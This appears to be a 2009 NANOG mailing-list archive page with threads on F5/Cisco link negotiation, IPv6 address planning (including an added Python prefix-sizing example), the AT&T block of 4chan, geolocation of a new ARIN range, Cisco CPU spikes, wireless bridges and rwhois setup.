From: packetmon...@gmail.com [mailto:packetmon...@gmail.com] On Behalf
Of Darren Bolding
Sent: Wednesday, August 19, 2009 6:58 PM
To: Christopher Greves
Cc: Scott Spencer; nanog@nanog.org
Subject: Re: F5/Cisco catalyst configuration question


What model BIG-IP? 

On some models I have had to set the BIG-IP's or the 6500 (can't remember
which) to specified speed/duplex and the other side to auto.

I believe it was auto on the BIG-IP and fixed on the 6500.

Setting both sides the same did not work.


On Wed, Aug 19, 2009 at 10:41 AM, Christopher Greves
christopher.gre...@mindspark.com wrote:


Scott,

We've had issues in the past with IOS 6500's auto-negotiating uplink
ports with an LTM into ISL Trunk mode. This only occurred when we had
the port on the LTM configured as a tagged interface. It was easily
solved by forcing the port on the 6500 into dot1q encapsulation. I'm not
sure this necessarily explains why you aren't seeing a link light on the
LTM though. I can't remember what the interface status was on both
sides. This does correlate to why it's working on the 2950's as they
don't support ISL and would likely negotiate into dot1q.

Chris


Christopher Greves  |  Senior Systems Engineer One North Lexington Ave,
9th Floor - White Plains, NY 10601 T 914-826-2067  |  C 914.420.8340  |
E christopher.gre...@mindspark.com
 
Mindspark Interactive Network, Inc. is an IAC company.




-Original Message-
From: Scott Spencer [mailto:sc...@dwc-computer.com]
Sent: Wednesday, August 19, 2009 1:13 PM
To: nanog@nanog.org
Subject: F5/Cisco catalyst configuration question

Trying to link an F5 Local Traffic Manager with a Cisco Catalyst 6500,
have matched ports (speed, duplex etc.) but no link light at all on the
F5. Does link with a Cisco 2950 switch in between but I need a direct
connection with the 6500.

Any suggestions what to try?

Best regards,

Scott Spencer
Data Center Asset Recovery/Remarketing Manager Duane Whitlow  Co. Inc.
Nationwide Toll Free: 800.977.7473.  Direct: 972.865.1395  Fax:
972.931.3340  mailto:sc...@dwc-computer.com sc...@dwc-computer.com
http://www.dwc-it.com/ www.dwc-it.com
Cisco/Juniper/F5/Foundry/Brocade/Sun/IBM/Dell/Liebert and more ~







-- 
--  Darren Bolding  --
--  dar...@bolding.org   --






IPv6 Addressing Help

2009-08-14 Thread Chris Gotstein
We are a small ISP that is in the process of setting up IPv6 on our 
network.  We already have the ARIN allocation and i have a couple 
routers and servers running dual stack.  Wondering if someone out there 
would be willing to give me a few pointers on setting up my addressing 
scheme?  I've been mulling over how to do it, and i think i'm making it 
more complicated than it needs to be.  You can hit me offlist if you 
wish to help.  Thanks.


--
Chris Gotstein
Sr Network Engineer
UP Logon/Computer Connection UP
500 N Stephenson Ave
Iron Mountain, MI 49801
Phone: 906-774-4847
Fax: 906-774-0335
ch...@uplogon.com



Re: IPv6 Addressing Help

2009-08-14 Thread Chris Gotstein
I think we had to let ARIN know the time frame of deploying IPv6 and how 
many customers we expected to put on in the first couple years.  They 
did not ask for an addressing scheme.


Reading over the RFC's and other IPv6 resources, we have decided to hand 
out /56's to small/home/SOHO customers and /48's to larger customers.


I'm just not able to wrap my brain around the subnetting that needs to 
be done on the router.  Like i said before, i think i'm just over 
complicating it in my mind.


Chris Gotstein
Sr Network Engineer
UP Logon/Computer Connection UP
500 N Stephenson Ave
Iron Mountain, MI 49801
Phone: 906-774-4847
Fax: 906-774-0335
ch...@uplogon.com

Thomas Mangin wrote:
I do not know about arin but ripe changed its policy so you only have
to say pretty please to receive your allocation. It's better that way
anyway.


Thomas Mangin

On 14 Aug 2009, at 16:17, Jeroen Massar jer...@unfix.org wrote:


Chris Gotstein wrote:

We are a small ISP that is in the process of setting up IPv6 on our
network.  We already have the ARIN allocation and i have a couple
routers and servers running dual stack.  Wondering if someone out there
would be willing to give me a few pointers on setting up my addressing
scheme?


Strange, I recall that you had to submit one when requesting address
space from ARIN. Why don't you use that one?


I've been mulling over how to do it, and i think i'm making it
more complicated than it needs to be.  You can hit me offlist if you
wish to help.  Thanks.


It all depends on your network and how you want to set it up, but for
the sake of internal aggregation:
* Determine the expected amount of IPv6 customers at a certain
  location for the next X years, making X  2 (though 10 is probably a
  better idea, just in case, if don't want to do it again ;) )
* Take that number round it up to a power of 2
* Every customer gets a /48, you know the number, which is a power of
  2, thus root it, and you know how many bits you need at that site

  eg expect 200 customers, round to power of 2 thus 256, which is 2^8,
  thus you will need a /48 + 8 bits = /40 at that location.

You now know how much address space you need at that location for the
next X years.

Repeat that for all your locations / routing areas, basically the PoPs
or termination points of your customers; or if you are really big do
that per city/town/suburb. Keep enough space (the rounding helps there
quite a bit, especially with numbers like 50k customers ;)

Now you have an overview of what you expect to be allocating at each and
every site. To add a little growth/future proof and to make life easy,
you could either opt at this stage to round everything off to 'nice'
numbers, eg only use /40's or /36's per PoP. Thus making everything the
same, or doing things like grouping smaller PoPs together.

Then when you have done that, take those blocks, and try to squeeze them
a bit together. You should now have arrived to the address plan that you
originally submitted to ARIN.

Fill those blocks into a nice database, roll a PHP/shell/perl/whatever
script to spit out your router configuration and presto: you are done.

Enjoy the weekend ;)

Greets,
Jeroen
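
The sizing steps in the quoted reply above, worked through as an added example (not code from the thread or its authors): each site's expected customer count is rounded up to a power of two, converted to a site prefix length, and the site blocks are packed largest-first into the parent allocation. The parent 2001:db8::/32 is the IPv6 documentation prefix, and the PoP names and customer counts are constructed sample values.

```python
import ipaddress
import itertools

# Constructed sample input: expected customers per PoP over the planning period.
SAMPLE_SITES = {"pop-a": 200, "pop-b": 3000, "pop-c": 12}


def site_prefix_len(expected_customers, customer_len=48):
    """Prefix length a site needs so each expected customer gets one block of
    customer_len: round the count up to a power of two and take that many
    bits off the customer prefix (200 -> 256 = 2^8 -> /48 minus 8 = /40)."""
    if expected_customers < 1:
        raise ValueError("expected_customers must be at least 1")
    bits = (expected_customers - 1).bit_length()  # ceil(log2(n)) without floats
    return customer_len - bits


def build_plan(parent, sites, customer_len=48, uniform_len=None):
    """Assign one aligned block per site out of `parent`.

    uniform_len gives every site at least a block of that size (the
    "only use /40's or /36's per PoP" option); sites that need more keep
    their larger block. Largest blocks are placed first so that every block
    falls on its natural boundary and no space is lost between them.
    """
    parent = ipaddress.IPv6Network(parent)
    sized = []
    for name, customers in sites.items():
        plen = site_prefix_len(customers, customer_len)
        if uniform_len is not None:
            plen = min(plen, uniform_len)
        if plen < parent.prefixlen:
            raise ValueError(f"{name} needs a /{plen}, larger than {parent}")
        sized.append((plen, name))
    sized.sort()  # shortest prefix (largest block) first, then by name

    cursor = int(parent.network_address)
    end = cursor + parent.num_addresses
    plan = {}
    for plen, name in sized:
        size = 1 << (128 - plen)
        cursor = -(-cursor // size) * size  # align up to the block boundary
        if cursor + size > end:
            raise ValueError(f"{parent} is too small for this plan")
        plan[name] = ipaddress.IPv6Network((cursor, plen))
        cursor += size
    return plan


def customer_blocks(site_net, count, customer_len=48):
    """First `count` customer prefixes inside a site block."""
    return list(itertools.islice(site_net.subnets(new_prefix=customer_len), count))


if __name__ == "__main__":
    for name, net in build_plan("2001:db8::/32", SAMPLE_SITES).items():
        first = customer_blocks(net, 1)[0]
        print(f"{name}: {net}  (first customer block {first})")
```

Passing `customer_len=56` sizes the same plan for the /56-per-customer case mentioned earlier in the thread.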






Re: Dan Kaminsky

2009-08-05 Thread Chris Adams
Once upon a time, Phil Regnauld regna...@catpipe.net said:
 Jorge Amodio (jmamodio) writes:
  It may sound too futuristic and inspired from science fiction, but I never saw
  Captain Picard typing a URL on the Enterprise.
 
   That's ok, I've never seen the Enterprise at the airport.

I have, but not that Enterprise (I saw the space shuttle orbiter
Enterprise on a 747 land here).

   Let's see how far the SMTP replacement has come, and get some 
 inspiration.
   Heck, it's an application that only _uses_ the DNS, should be easy.

There's always somebody looking to re-invent the wheel, but usually they
are startups looking to make a quick buck by patenting and licensing
their technology that will be the savior of the Internet (and so they
don't get far).
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: Dan Kaminsky

2009-08-05 Thread Chris Adams
Once upon a time, Ben Scott mailvor...@gmail.com said:
   In the vast majority of cases I have seen, people don't type
 domain names, they search the web.  When they do type a domain name,
 they usually type it into the Google search box.

Web != Internet.  DNS is used for much more than web sites, and many of
those things are not in a public index.  For example, most people type
in their friends' email addresses (at least into an address book).
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: cisco.com

2009-08-04 Thread Chris Gotstein
Seeing same issue from Chicago via Qwest and HE.



 Both work from Austin, TX.



   - d.

 On Tue, 4 Aug 2009, Alex Nderitu wrote:

 Facebook seems to also be affected.


 -Original Message-
 From: R. Benjamin Kessler r...@mnsginc.com
 To: nanog@nanog.org
 Subject: cisco.com
 Date: Tue, 4 Aug 2009 09:34:46 -0400


 Hey Gang -

 I'm unable to get to cisco.com from multiple places on the 'net
 (including downforeveryoneorjustme.com); any ideas on the cause and ETR?

 Thanks,

 Ben





 --
 Dominic J. Eidson
   Baruk Khazad! Khazad ai-menu! -
 Gimli
 
 http://www.dominiceidson.com/




-- 
Chris Gotstein
Sr Network Engineer
UP Logon/Computer Connection UP
500 N Stephenson Ave
Iron Mountain, MI 49801
Phone: 906-774-4847
Fax: 906-774-0335
ch...@uplogon.com




Re: OT: Voice Operators' Group forming

2009-07-29 Thread Chris Meidinger

On 29.07.2009, at 22:52, Jason LeBlanc wrote:


Brandon Butterworth wrote:

NAVOG  works for me.



I'd prefer Voice Operators' Group Online Network

brandon



*claps*


Imagine the poetry you have to listen to when _those_ guys put you on  
hold...




Re: ATT. Layer 6-8 needed.

2009-07-27 Thread chris rollin
Apparently not

Back to the kids' table !


On Mon, Jul 27, 2009 at 12:38 AM, William Pitcock neno...@systeminplace.net
 wrote:

 On Sun, 2009-07-26 at 20:05 -0700, Shon Elliott wrote:
  There has been a lot of customers on our network who were complaining about ACK
  scan reports coming from 207.126.64.181. We had no choice but to block that
  single IP until the attacks let up.

 ...have you ever heard of forged packet headers?  Just saying.

 William
 --
 William Pitcock
 SystemInPlace - Simple Hosting Solutions
 1-800-688-5018





Re: ATT. Layer 6-8 needed.

2009-07-27 Thread chris rollin
This only protects ISPs from, upon being served notice, being liable for content
A majority of the CDA was overturned, as it violates both first and fifth
amendments.  What is left of it only applies to ISPs PUBLISHING (*not*
filtering) content

This is Net Neutrality realm



On Mon, Jul 27, 2009 at 1:25 AM, Andrew D Kirch trel...@trelane.net wrote:

 William Pitcock wrote:
  On Sun, 2009-07-26 at 23:15 -0700, Shon Elliott wrote:
 
  Okay, so how do YOU block the attacks from eating up your bandwidth
  and filling
  up your logs without blocking the entire IP?
 
 
  If I was ATT, I would purchase DDoS filtering equipment and run it at
  edge where all of my traffic is peering anyway.
 
  This discussion is about ATT, not you.
 
  William
 
 While I agree, I certainly believe that due to the nature of some of the
 content
 on 4chan, ATT can make a strong Good Samaritan claim under 47USC230.
 There's
 always TOR.


 Andrew D Kirch




Re: ATT. Layer 6-8 needed.

2009-07-27 Thread chris rollin
On Mon, Jul 27, 2009 at 1:37 AM, Shon Elliott s...@unwiredbb.com wrote:

 Chris,

 Have you even read any of the other posts on here.

I fade in and out


 I have been talking about
 spoofed packets in this thread multiple times.

man engrish


 I do know what it is. I would appreciate you not making stupid comments like 
 that.

As was stated before, this isnt about you
In other news, it looks like ATT is quietly removing filters from
cities.  Chicago still showing down



Re: ATT. Layer 6-8 needed.

2009-07-26 Thread chris rollin
Shon wrote:

Seth,

 I said it could be, not that it is. Thanks for pointing that out. However, I
 believe the reason they are being blocked at ATT is the main reason I supplied
 on my first post. The DDoS attack issue is the main ticket here.

The ACK storms aren't coming from the 4chan servers
It's just like the DNS attack (IN/NS/.).  It points to the stupidity of ATT
uppers
SANS: Are you or aren't you soliciting data?  I have some to confirm also

 It's not
 because of content, or to piss people off. It's to protect their network, as any
 of you would do when you got DDoSed on your own networks.

They are going to get some first hand experience in what Protecting their
Network involves real soon, now.  Blocking 4chan was an exercise in Stupidity

 It's damage control,

It's a damage challenge.

 essentially, until they find out who is involved and block them, then they'll
 likely lift the block.

They don't have the right to do this.  Not in their TOS/EULA/User-Agreement.
Not in any sane legal forum.  (I*A*AL)

 This ISN'T the first time this has happened.

Exactly.

Now you see the problem ?


Re: ATT. Layer 6-8 needed.

2009-07-26 Thread chris rollin
Uh.
  You posted on Twitter.

  The most trusted name in [?]

On Mon, Jul 27, 2009 at 12:17 AM, John Bambenek bambe...@gmail.com wrote:

 We'll take data from **Trusted** sources.

 I'm just not going to take a public open mailing list post as evidence at
 this point.


 chris rollin wrote:

 Shon wrote:

 Seth,

 I said it could be, not that it is. Thanks for pointing that out. However, I
 believe the reason they are being blocked at ATT is the main reason I supplied
 on my first post. The DDoS attack issue is the main ticket here.

 The ACK storms aren't coming from the 4chan servers
 It's just like the DNS attack (IN/NS/.).  It points to the stupidity of ATT
 uppers
 SANS: Are you or aren't you soliciting data?  I have some to confirm also

 It's not
 because of content, or to piss people off. It's to protect their network, as any
 of you would do when you got DDoSed on your own networks.

 They are going to get some first hand experience in what Protecting their
 Network involves real soon, now.  Blocking 4chan was an exercise in Stupidity

 It's damage control,

 It's a damage challenge.

 essentially, until they find out who is involved and block them, then they'll
 likely lift the block.

 They don't have the right to do this.  Not in their TOS/EULA/User-Agreement.
 Not in any sane legal forum.  (I*A*AL)

 This ISN'T the first time this has happened.

 Exactly.

 Now you see the problem ?






Re: questionable email filtering policies?

2009-07-24 Thread Chris Hills

On 23/07/09 22:22, goe...@anime.net wrote:

Seems rather unwise to filter your abuse mailbox.

- The following addresses had permanent fatal errors -
ab...@btopenworld.com
(reason: 554 Message not allowed - UP Email not accepted for policy
reasons. Please visit
http://help.yahoo.com/help/us/mail/defer/defer-04.html [120])

-Dan


On the topic of mail rejection I have come across a few sites that 
reject mail, even to postmaster@, from domains that have one or more 
ipv6-only MX records listed (i.e. a domain name with AAAA but no A 
record(s)). The common factor seems to be mimedefang.





Re: Recommendations for Hong Kong datacenter, and a sanity check for my geopolitical conclusions ?

2009-07-24 Thread Chris McDonald
Making every effort to not pimp my employer (pccw), I would say that
the Equinix in HK is good and they have a decent equinix direct
product (one bill to pay).  If you're looking more for a managed
colo, pccw owns powerbase which does that sort of thing.  HKCOLO is
good but space is hard to come by.







On 7/24/09, George Sanders gosand1...@yahoo.com wrote:


 I will be expanding a small network infrastructure service (read: DNS and
 mail ... a few 1u and 2u servers) to Hong Kong next year.

 We don't have any particular customer base in Hong Kong - rather, we have
 customers all over southeast asia and would like to serve them better, as
 well as attract more SE Asia customers.

 I chose Hong Kong for the following reasons:

 - South Korea is alternately happy with / upset with Japan, and I don't want
 to deal with that

 - Japan is alternately happy with / upset with South Korea, and I don't
 want to deal with that

 - Mainland China is out of the question, for obvious reasons

 - The smaller (Thailand, Vietnamese, Philippines, etc.) countries all have
 their own particular issues (recent coup in Thailand, etc.)

 So the choice came down to Hong Kong or Singapore, and I chose Hong Kong
 because it seems easier to just get things done there.  I realize that in
 the long term there is a greater risk of social paradigm shift in Hong Kong
 because of mainland China, but in the short run it seems that Hong Kong is
 more functional than Singapore.

 Any comments on the above thought process ?


 The obvious follow-up is, which datacenter ?

 I need a full service center that will give me rackspace and let me just
 plug ethernet into their switch.  I am not interested in brokering my own
 connectivity, nor am I interested in running my own routers.  I want to pay
 one bill to one organization and get one cable.  The end.

 I think there are further considerations though ... I read details of one
 very modern, very sexy datacenter housed in a skyscraper, but my research
 showed me that this building has been built on land reclaimed from the sea,
 and there is reasonable concern that the sand underpinnings could liquify,
 to a degree, in a seismic event.  I'd also like to be more than a few feet
 above sea level.  Honestly, as sexy as it would be to be in a slick tower
 right on the bay in Central Hong Kong, I would much rather find some
 nondescript, one story building, miles from the coast and a few hundred feet
 above sea level.

 What recommendations might someone have ?

 Thank you very much for any comments or suggestions you may have.





-- 
Sent from Gmail for mobile | mobile.google.com



Re: Issues accessing hulu.com from new(ish) US range

2009-07-16 Thread Chris Taylor
Thanks to all that contacted me offlist and on, I believe it should be 
sorted shortly in all the relevant databases.



Thanks again,

Chris



Issues accessing hulu.com from new(ish) US range

2009-07-15 Thread Chris Taylor

Would someone from hulu.com please contact me offlist?

Alternatively, if anyone has contact details for a vaguely clueful 
person there, that would be appreciated.


We had a new range allocated to us by ARIN around 6 months ago for our 
US business, and hulu are claiming it's non-us. Our guess is that it's a 
canned response by first-line support.


Also, does anyone happen to know which geolocation databases hulu use?


Thanks,
Chris



Re: Issues accessing hulu.com from new(ish) US range

2009-07-15 Thread Chris Taylor

ML wrote:

Chris Taylor wrote:

Would someone from hulu.com please contact me offlist?

Alternatively, if anyone has contact details for a vaguely clueful 
person there, that would be appreciated.


We had a new range allocated to us by ARIN around 6 months ago for our 
US business, and hulu are claiming it's non-us. Our guess is that it's 
a canned response by first-line support.


Also, does anyone happen to know which geolocation databases hulu use?


Thanks,
Chris



Did you Swip the block?

https://www.arin.net/resources/request/reassignments.html




Pretty certain we've done this.
It wasn't myself that did it, but if I'm reading that page correctly, it 
updates the whois database, and that returns our US company details.


Also, ip2location.com and ipinfodb.com both report a selection of IP's 
in the range to be US IP's.



Thanks,
Chris



Re: Issues accessing hulu.com from new(ish) US range

2009-07-15 Thread Chris Taylor

Frank Bulk - iName.com wrote:
A few others I would check: 
- Akamai (you can contact them via their web page, but there are also people
on this listserv that can check, too)
- Google (if their search pages comes up in American English, you're good to
go, otherwise there's info in their help that will let you fill out a form)
- MaxMind (there's a contact form on their web page)

Contact me offline if you want a list of (more minor) GeoIP sites I have
bookmarked.

Frank


Thanks for that Frank.

I've had contacts from Akamai and a couple of others off-list now. I've 
also checked MaxMind - their database appears to be up to date as well.


I can't check Google at this second, as I'm based in the UK - I'll be 
setting something up for such tests tonight or tomorrow, but I seem to 
remember that we've previously spoken to them about it.


Thanks,

Chris



-Original Message-
From: Chris Taylor [mailto:chris.tay...@sohonet.co.uk] 
Sent: Wednesday, July 15, 2009 3:51 AM

To: nanog@nanog.org
Subject: Issues accessing hulu.com from new(ish) US range

Would someone from hulu.com please contact me offlist?

Alternatively, if anyone has contact details for a vaguely clueful 
person there, that would be appreciated.


We had a new range allocated to us by ARIN around 6 months ago for our 
US business, and hulu are claiming it's non-us. Our guess is that it's a 
canned response by first-line support.


Also, does anyone happen to know which geolocation databases hulu use?


Thanks,
Chris





--
Chris Taylor
Engineer

Sohonet Limited
60 Poland Street
London
W1F 7NT

t +44 (0)2072926909
m +44 (0)7919897978
f +44 (0)2072926901



Re: Point to Point Ethernet

2009-07-10 Thread Chris Adams
Once upon a time, Ricky Beam jfb...@gmail.com said:
 Ethernet is cheap because it's everywhere, and built into almost  
 everything. (however, the likes of Cisco and Juniper still charge insane  
 amounts for line cards, be they ethernet, T1, or OC48.) Given the choice  
 of buying a $4k DS3 card or just plugging into an existing, builtin  
 ethernet port, which do you think most people will choose?

Also, if you are plugging in a lower-speed link, you can plug ethernet
in a $1000 switch and trunk it to a router, while a mux for T1/T3/OCx
circuits costs a lot more.

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: Using twitter as an outage notification

2009-07-04 Thread Chris Hills

On 04/07/09 17:07, Roland Perry wrote:

That's the kind of marketing-led response I was hoping to hear.

But the UK National Rail system now uses Tweets to tell customers about
disruptions on the trains, and several major UK government departments
and news organisations use it for announcements and Breaking News.

So has it become respectable yet?


When there are open-source equivalents available (e.g. Laconica, 
OpenMicroBlogger - both of which incidentally are compatible since they 
are based upon the OMB spec), I do wonder why a commercial or government 
entity would use a closed-source, non-domestic service.





QNET protocol ID 006A

2009-06-29 Thread Chris Ledford
I am looking for any information on QNET protocol ID 006A traffic... Our 7604 
spikes to 100% every hour and 30 sec's... and I am seeing this traffic... any 
help on this would be appreciated

NEOVERTIKA.7604#sh proc cpu hist

 1111221211
 68647809388388
100
 90
 80
 70
 60
 50
 40
 30  **   *
 20  **
 10  **
051122334455
  0505050505

   CPU% per second (last 60 seconds)

  1
 2043535434343233434332345353343353633543426336
 8033127794325960220499555465375507850545124033097221386492
100   *
 90   *
 80   *
 70   **
 60   **   *   *   *  *
 50   *  * **  *** *  *  * *  **  *
 40   #* *  ** * *   * ** *** * ** * * * **
 30  *#**#***#**#***#* ***#**#*
 20  ##
 10  ##
051122334455
  0505050505

   CPU% per minute (last 60 minutes)
  * = maximum CPU%   # = average CPU%

 111 1 11 11 1  11   111111 111 11 1 1
 000909009009099009780009569000900090090909
 000909009009099009080009889000800090090909
100  **    
 90  ** *  
 80  ** *  
 70   *
 60  **
 50  **
 40  **#**#
 30  #**##*****
 20  ######***##**###**
 10  ##
051122334455667.
  0505050505050

   CPU% per hour (last 72 hours)
  * = maximum CPU%   # = average CPU%

Packets look like this:

--- dump of outgoing inband packet ---
interface IB0/0, routine draco2_ibc_soutput
dbus info: src_vlan 0x0(0), src_indx 0x387(903), len 0x7C(124)
  bpdu 0, index_dir 0, flood 0, dont_lrn 1, dest_indx 0x0(0)
  00020008 A800 0387 7C00    
mistral hdr: req_token 0x0(0), src_index 0x387(903), rx_offset 0x30(48)
  requeue 0, obl_pkt 0, vlan 0x0(0)
destmac 00.00.00.00.00.00, srcmac 00.18.74.2C.75.C0, protocol 006A
layer 3 data: 0300 000C0113 FF00FF00 0201  
       
     0387 0380 0812

--- dump of outgoing inband packet ---
interface IB0/0, routine draco2_ibc_soutput
dbus info: src_vlan 0x0(0), src_indx 0x387(903), len 0x7C(124)
  bpdu 0, index_dir 0, flood 0, dont_lrn 1, dest_indx 0x0(0)
  00020008 A800 0387 7C00    
mistral hdr: req_token 0x0(0), src_index 0x387(903), rx_offset 0x30(48)
  requeue 0, obl_pkt 0, vlan 0x0(0)
destmac 00.00.00.00.00.00, srcmac 00.18.74.2C.75.C0, protocol 006A
layer 3 data: 0300 000C0113 FF00FF00 0201  
       
     0387 0380 0819

V/r

Thanks in advance,

Chris Ledford
NOC ATOG Engineer
CCNA/CCSP/CVOICE
A+/NET+/SEC+/LINUX+/MCPe

Connexion Technologies
Office:1240 Commerce Drive, Suite A
Gulf Shores, AL 36542
Mailing: P O Box 1245
Gulf Shores, AL  36547
NOC: 251-224-0662
P | 251.224.0972 or 251-224-0800 ext 65071
F | 251.224.0830
C | 251.923.8340
E | chris.ledf...@cnxntech.com



Connexion Technologies is the service mark and trade name of Capitol 
Infrastructure, LLC.

Re: NANOG Digest, Vol 17, Issue 51

2009-06-18 Thread Chris Ledford
Cisco aironet ...reliable and the only way to go ...

Chris ledford
CCNA CCSP CWLSS
--Original Message--
From: nanog-requ...@nanog.org
To: nanog@nanog.org
ReplyTo: nanog@nanog.org
Subject: NANOG Digest, Vol 17, Issue 51
Sent: Jun 18, 2009 9:23 AM


Today's Topics:

   1. Wireless bridge (Peter Boone)
   2. Re: Wireless bridge (Jared Mauch)
   3. Re: WISP NMS recommendations (Patrick Shoemaker)
   4. Re: Wireless bridge (Joe Tyson)
   5. Re: Wireless bridge (Chuck Anderson)
   6. Re: Wireless bridge (Roy)
   7. Re: Wireless bridge (Curtis Maurand)
   8. Re: Wireless bridge (Joel Jaeggli)


--

Message: 1
Date: Thu, 18 Jun 2009 09:05:56 -0400
From: Peter Boone na...@aquillar.com
Subject: Wireless bridge
To: nanog@nanog.org
Message-ID: 005c01c9f015$852ae490$8f80ad...@com
Content-Type: text/plain;   charset=us-ascii

Hi NANOG,

I'm looking for some equipment recommendations for a wireless bridge between
two locations approximately 500-800 meters apart. The current setup for this
company has been extremely unstable and slow. I don't have a lot of
experience in this area so I was hoping someone could give me a few
pointers.

Currently, both locations are using Linksys WRT54GL's flashed with DD-WRT
firmware (Yes, 802.11g. All extra bells and whistles are disabled in the
firmware. They were set up for WDS so other wireless clients could connect
to the same access point, with varying degrees of success. Not very
important). They are connected to SmartAnt 2300-2500 MHz 14 dBi directional
antenna mounted on the roof (extended pretty high for perfect line of
sight). I'm not sure when they got these antenna exactly but I'm told it was
when WiFi was very new. The network is very small so both locations share
the same subnet (192.168.1.0/24).

They have gone through numerous Linksys access points over the years. The
wireless settings are tweaked as best as possible, and we have found the
connection to be most stable when the TX is limited to 6-9 Mbps.

We have explored other options as well. An internet connection at each
location + VPN is out due to very slow upstream speeds (the buildings are in
an industrial area, ADSL is the only option.) The max they offer on regular
business accounts is 800 kbps up. T1 lines are even slower and even more
expensive. They won't offer us any other solutions such as fibre. We have
considered running fibre/coax but there is too much construction activity
and other property in the way.

I'm looking into RouterBOARD right now, considering a RB433AH and R52H
wireless card, but I'm not sure this will actually solve the problem. It's
difficult to determine if the issue is with the antennas or access points
(for example, after a good thunderstorm, the wireless link will be down for
at least 12 hours, but will fix itself eventually. Resetting either access
point will keep the link down for at least 30 minutes. Using an airgun on
the access points tends to make them more reliable, even if they are clean
and dust free. From the admin interface, each access point will report
seeing a very good and strong signal from the other, yet they refuse to
communicate until they feel like it a few hours later.)

Any suggestions welcome. I'm sure you can tell cost is a bit of a factor
here but it will be easy for me to justify a higher price if I'm confident
it will be effective.

While I'm at it, I've been reading along on the list for over a year now;
thanks everyone for sharing your real world experiences :)

Peter




--

Message: 2
Date: Thu, 18 Jun 2009 09:18:24 -0400
From: Jared Mauch ja...@puck.nether.net
Subject: Re: Wireless bridge
To: Peter Boone na...@aquillar.com
Cc: nanog@nanog.org
Message-ID: 20090618131824.ga25...@puck.nether.net
Content-Type: text/plain; charset=us-ascii

On Thu, Jun 18, 2009 at 09:05:56AM -0400, Peter Boone wrote:
 Hi NANOG,
 
 I'm looking for some equipment recommendations for a wireless bridge between
 two locations approximately 500-800 meters apart. The current setup for this
 company has been extremely unstable and slow. I don't have a lot of
 experience in this area so I was hoping someone could give me a few
 pointers.

I've had good luck with Cisco Aironet gear running in repeater mode.

I've done the cheap linksys thing as well and it just did not work
as well as using some equipment that was better designed.

I have actually found the non-IOS software on the aironet 350/340 to 
be more

Re: Verio taking twitter down during Iran Election Riots?

2009-06-16 Thread Chris Woodfield
What's interesting is that the !NANOG part of the universe presumes  
the maintenance was to be performed by Twitter, not by their carrier  
(i.e. server, not network, upgrades). Given the fact that the  
WhaleFail has become a commonly-recognizable sight, I can see this  
make people a bit, um, nervous. The real impact of the maintenance  
would have most likely been minimal short of a Murphy strike.


That said, kudos to NTT for backing off in the face of some pretty  
momentous current events, and hope the delay doesn't cause too many  
ripple-effect problems for them.


-C

On Jun 16, 2009, at 10:48 AM, Jack Bates wrote:


Erik Fichtner wrote:

And yet, all upgrades can be postponed with the right... motivation.



Hmmm, you do know that motivation may have strictly been, Your  
maintenance corresponds with a major event, can you put it off for a  
day?


The maintenance in question has obviously been marked critical by  
NTTA with what appears to be short notification and limiting the  
delay to a minimum. They may have been unaware of the event and its  
importance to their customers.


I'm more curious about what maintenance they are actually  
performing. I know they run mixed Cisco/Juniper, and all their  
Junipers should be able to handle in service upgrades. Of course,  
even switching hits of an upgrade warrants setting a maintenance  
window and notification due to Murphy.


Jack






Re: Rwhoisd solution?

2009-06-12 Thread Chris Wallace

Do you have a link to the information on how to get that setup?

---Chris



On Jun 10, 2009, at 1:05 PM, Chris Stone wrote:

Can someone please point me in the direction of an rwhoisd solution to
be run on a CentOS Linux platform? ARIN is now punting rwhois queries
to us and frankly i've been unable to find an easy to install/use
solution to answer these queries. I've seen the rwhoisd at
projects.arin.net but the documentation on it is ghastly to say the
least.


If you use IPPlan to manage your IP allocations, it comes with a whois
daemon that'll automagically use the information from your IPPlan sql
database.


Chris






Re: ICSI Netalyzr launch

2009-06-12 Thread Chris Grundemann
On Fri, Jun 12, 2009 at 09:43, Randy Bushra...@psg.com wrote:
 sure, we need a privacy policy that can be arbitrarily changed with no
 ... previous ...
 notice just as we have for ...
 ... everything !!!

 exactly.  so was the question a troll, a red herring, or just a rant?

 randy



I guess it was just a rant, I like to know more specifically how folks
intend to use data before I hand it over - and I like that promise to
be at least theoretically enforceable.  I am far from a lawyer but it
is my understanding that an official pp is much more substantive and
binding than a single FAQ answer -- especially in the eyes of the FTC.
 Yes policies can be changed but I can follow those changes and stop
using the service/tool/etc if I don't like the changes.

If you are saying that the policy can be changed after the fact to
allow uses of the data for purposes or in manners other than those
originally stated, I think you are wrong, see the 2004 case between
the FTC and Gateway Learning as one example I know of off hand:

Howard Beales, Director of the FTC’s Bureau of Consumer Protection.
“You can change the rules but not after the game has been played.”
(http://www.ftc.gov/opa/2004/07/gateway.shtm)

I will grant you that in this case the data being collected is
probably not that sensitive, but the access to my computer is - to me
at least.  I for one would have used the tool immediately had there
been an acceptable PP or other TOS in place but without it I
hesitate...  So I figured I would bring it up.

~Chris

PS - if you are interested in TOS related stuff, might be worthwhile
to check out http://www.tosback.org/timeline.php a new project
launched by the EFF (no affiliation, just fyi)



Re: ICSI Netalyzr launch

2009-06-12 Thread Chris Grundemann
On Fri, Jun 12, 2009 at 11:03, Randy Bushra...@psg.com wrote:
 sure, we need a privacy policy that can be arbitrarily changed with no
 ... previous ...
 notice just as we have for ...
 ... everything !!!
 exactly.  so was the question a troll, a red herring, or just a rant?
 If you are saying that the policy can be changed

 i am saying all this is specious.

 if you don't like it, don't use it.  i have been using vern's stuff for
 15 years or so, and trust him vastly more than i trust 94.3% of all the
 other services you trust.

 randy


Probably so and it was not my intention to attack Vern, Berkeley, ICIR
nor infer that they were not trustworthy.  Just pointing out a
possible place for improvement from my view.

~Chris



Re: Rwhoisd solution?

2009-06-10 Thread Chris Wallace
I used this guide and it worked quite well.  The writer was using  
FreeBSD but I installed onto  Ubuntu and ran into little to no issues.


http://www.unixadmin.cc/rwhois/

---Chris



On Jun 6, 2009, at 10:37 AM, Jeffrey Lyon wrote:


NANOGers,

Can someone please point me in the direction of an rwhoisd solution to
be run on a CentOS Linux platform? ARIN is now punting rwhois queries
to us and frankly i've been unable to find an easy to install/use
solution to answer these queries. I've seen the rwhoisd at
projects.arin.net but the documentation on it is ghastly to say the
least.

